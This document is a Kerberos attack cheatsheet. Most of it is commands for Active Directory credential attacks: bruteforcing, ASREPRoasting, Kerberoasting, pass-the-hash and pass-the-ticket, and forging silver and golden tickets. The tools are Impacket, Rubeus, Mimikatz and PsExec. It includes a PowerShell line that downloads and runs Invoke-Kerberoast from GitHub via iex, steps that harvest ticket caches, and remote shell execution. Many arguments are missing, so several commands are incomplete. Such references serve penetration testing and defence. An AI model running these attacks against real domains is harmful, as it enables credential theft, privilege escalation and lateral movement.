# Kerberos cheatsheet

## Bruteforcing

With kerbrute.py:

```shell
python kerbrute.py -domain -users -passwords -outputfile
```

With Rubeus version with brute module:

```powershell
# with a list of users
.\Rubeus.exe brute /users: /passwords: /domain: /outfile:

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords: /outfile:
```
## ASREPRoast

With Impacket example GetNPUsers.py:

```shell
# check ASREPRoast for all domain users (credentials required)
python GetNPUsers.py /: -request -format -outputfile

# check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py / -usersfile -format -outputfile
```

With Rubeus:

```powershell
# check ASREPRoast for all users in current domain
.\Rubeus.exe asreproast /format: /outfile:
```

Cracking with dictionary of passwords:

```shell
hashcat -m 18200 -a 0
john --wordlist=
```
## Kerberoasting

With Impacket example GetUserSPNs.py:

```shell
python GetUserSPNs.py /: -outputfile
```

With Rubeus:

```powershell
.\Rubeus.exe kerberoast /outfile:
```

With Powershell:

```powershell
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
```

Cracking with dictionary of passwords:

```shell
hashcat -m 13100 --force
john --format=krb5tgs --wordlist=
```
## Overpass The Hash/Pass The Key (PTK)

By using Impacket examples:

```shell
# Request the TGT with hash
python getTGT.py / -hashes [lm_hash]:

# Request the TGT with aesKey (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
python getTGT.py / -aesKey

# Request the TGT with password
python getTGT.py /:[password]
# If not provided, the password is asked for interactively

# Set the TGT for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
```

With Rubeus and PsExec:

```powershell
# Ask for the TGT and inject it
.\Rubeus.exe asktgt /domain: /user: /rc4: /ptt

# Execute a cmd in the remote machine
.\PsExec.exe -accepteula \\ cmd
```
## Pass The Ticket (PTT)

### Harvest tickets from Linux

Check type and location of tickets:

```shell
grep default_ccache_name /etc/krb5.conf
```

If nothing is returned, the default is `FILE:/tmp/krb5cc_%{uid}`.

In case of file tickets, you can copy them (if you have permissions) in order to use them.

If the tickets are stored in a KEYRING, you can use tickey to get them:

```shell
# Dumps the current user's tickets; if root, tries to dump them all by injecting into other users' processes
# to inject, copy tickey to a folder reachable by all users
cp tickey /tmp/tickey
/tmp/tickey -i
```
### Harvest tickets from Windows

With Mimikatz:

```
mimikatz # sekurlsa::tickets /export
```

With Rubeus in Powershell:

```powershell
.\Rubeus.exe dump

# Rubeus dumps the tickets in base64; to write one of them to a file
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String(""))
```

To convert tickets between Linux/Windows format with ticket_converter.py:

```shell
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```
### Using ticket in Linux

With Impacket examples:

```shell
# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
```

### Using ticket in Windows

Inject ticket with Mimikatz:

```
mimikatz # kerberos::ptt
```

Inject ticket with Rubeus:

```powershell
.\Rubeus.exe ptt /ticket:
```

Execute a cmd in the remote machine with PsExec:

```powershell
.\PsExec.exe -accepteula \\ cmd
```
## Silver ticket

With Impacket examples:

```shell
# To generate the TGS with NTLM
python ticketer.py -nthash -domain-sid -domain -spn

# To generate the TGS with AES key
python ticketer.py -aesKey -domain-sid -domain -spn

# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGS
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
```

With Mimikatz:

```
# To generate the TGS with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:

# To generate the TGS with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:

# To generate the TGS with AES 256 key (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:

# Inject TGS with Mimikatz
mimikatz # kerberos::ptt
```

Inject ticket with Rubeus:

```powershell
.\Rubeus.exe ptt /ticket:
```

Execute a cmd in the remote machine with PsExec:

```powershell
.\PsExec.exe -accepteula \\ cmd
```
## Golden ticket

With Impacket examples:

```shell
# To generate the TGT with NTLM
python ticketer.py -nthash -domain-sid -domain

# To generate the TGT with AES key
python ticketer.py -aesKey -domain-sid -domain

# Set the ticket for impacket use
export KRB5CCNAME=

# Execute remote commands with any of the following by using the TGT
python psexec.py /@ -k -no-pass
python smbexec.py /@ -k -no-pass
python wmiexec.py /@ -k -no-pass
```

With Mimikatz:

```
# To generate the TGT with NTLM
mimikatz # kerberos::golden /domain:/sid: /rc4: /user:

# To generate the TGT with AES 128 key
mimikatz # kerberos::golden /domain:/sid: /aes128: /user:

# To generate the TGT with AES 256 key (stronger encryption and probably stealthier, since AES is what Microsoft uses by default)
mimikatz # kerberos::golden /domain:/sid: /aes256: /user:

# Inject TGT with Mimikatz
mimikatz # kerberos::ptt
```

Inject ticket with Rubeus:

```powershell
.\Rubeus.exe ptt /ticket:
```

Execute a cmd in the remote machine with PsExec:

```powershell
.\PsExec.exe -accepteula \\ cmd
```
## Misc

To get NTLM from password (the NT hash is MD4 over the UTF-16LE encoding of the password; Python 3 syntax):

```shell
python3 -c 'import hashlib; print(hashlib.new("md4", "<password>".encode("utf-16le")).hexdigest())'
```
## Tools

- Impacket
- Mimikatz
- Rubeus
- Rubeus with brute module
- PsExec
- kerbrute.py
- tickey
- ticket_converter.py